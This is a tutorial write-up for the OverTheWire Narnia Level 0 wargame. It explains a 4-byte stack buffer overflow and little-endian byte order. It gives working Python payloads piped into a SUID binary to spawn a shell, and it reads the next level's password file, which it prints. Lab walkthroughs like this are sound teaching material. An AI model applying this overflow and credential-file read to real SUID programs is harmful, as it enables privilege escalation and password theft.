OverTheWire Narnia Level 0 → 1 tutorial!!

Login

Log in as narnia0.

ssh narnia0@narnia.labs.overthewire.org -p 2226
# password: narnia0

Why? Each Narnia level is a separate UNIX user. To solve Level 0 → 1 you must be the narnia0 user.

Task

You’re given an executable /narnia/narnia0 and its source code narnia0.c. Goal: change the variable val from 0x41414141 to 0xdeadbeef to trigger a SUID shell as narnia1.

A little bit of Theory

• The program declares:

  • char buf[20]; → a 20-byte stack buffer
  • long val = 0x41414141;
• It then calls scanf("%24s", buf); → reads up to 24 bytes into a 20-byte buffer → classic stack overflow of 4 bytes.
• On little-endian x86, the byte order for 0xdeadbeef is \xef\xbe\xad\xde (least significant byte first).
• If the 4 bytes after buf are val, overflowing buf by exactly 4 bytes lets us overwrite val.

Further reading:

• What is a buffer overflow?
• Endianness explained
• scanf(3) manual

Solution

1. Run once to see behavior

   cd /narnia
   ./narnia0
   # Correct val's value from 0x41414141 -> 0xdeadbeef!
   # Here is your chance: TEST
   # buf: TEST
   # val: 0x41414141
   # WAY OFF!!!!
   

   Why? Confirms default val and the exact messages the binary prints.

2. Prove we control val (pattern write)

   Send 20 A (fill buf) + 4 B (overwrite val) + newline:

   python3 - <<'PY' | ./narnia0
   

import sys sys.stdout.buffer.write(b”A”*20 + b”BBBB” + b”\n”) PY

…

val: 0x42424242

WAY OFF!!!!

*Why?* `BBBB` is `0x42`×4 → `0x42424242`. Seeing that value proves the overwrite.

3. **Write the correct value (`0xdeadbeef`) and keep the shell alive**

The binary spawns a shell when `val == 0xdeadbeef`. We’ll:
- Overflow `buf` with 20 `A`.
- Overwrite `val` with **`\xef\xbe\xad\xde`**.
- Pipe into `cat` so the spawned shell stays interactive.

```bash
( python3 - <<'PY'
import sys
sys.stdout.buffer.write(b"A"*20 + b"\xef\xbe\xad\xde" + b"\n")
PY
cat ) | ./narnia0

Expected lines include:

Correct val's value from 0x41414141 -> 0xdeadbeef!
val: 0xdeadbeef

1. Verify and dump the next password

   Inside the spawned shell:

   whoami
   # narnia1
   id
   cat /etc/narnia_pass/narnia1
   

Password

From my run, the password for narnia1 is:

efeidiedae

(If your output differs, use the one your terminal printed.)

Troubleshooting

• Still shows WAY OFF!!!! You probably wrote \xde\xad\xbe\xef (big-endian). Use \xef\xbe\xad\xde (little-endian).
• Shell exits immediately Don’t just pipe once; use the subshell + cat trick shown above to keep stdin open.
• Weird characters / locale issues Always send raw bytes via Python (sys.stdout.buffer.write) instead of echo -e.
• Nothing happens after printing prompts Hit Enter — scanf("%24s", ...) expects a newline to finalize the input token.

Copy-paste quick run (one-liner)

( python3 - <<'PY'
import sys
sys.stdout.buffer.write(b"A"*20 + b"\xef\xbe\xad\xde" + b"\n")
PY
cat ) | /narnia/narnia0
# then inside the spawned shell:
# whoami; cat /etc/narnia_pass/narnia1

Congrats 🎉 Classic 4-byte stack overflow, correct endianness, SUID shell, next password in your pocket. See you in Level 1 → 2!

Thanks for reading!

Until next time — Otsumachi!! 💖☄️✨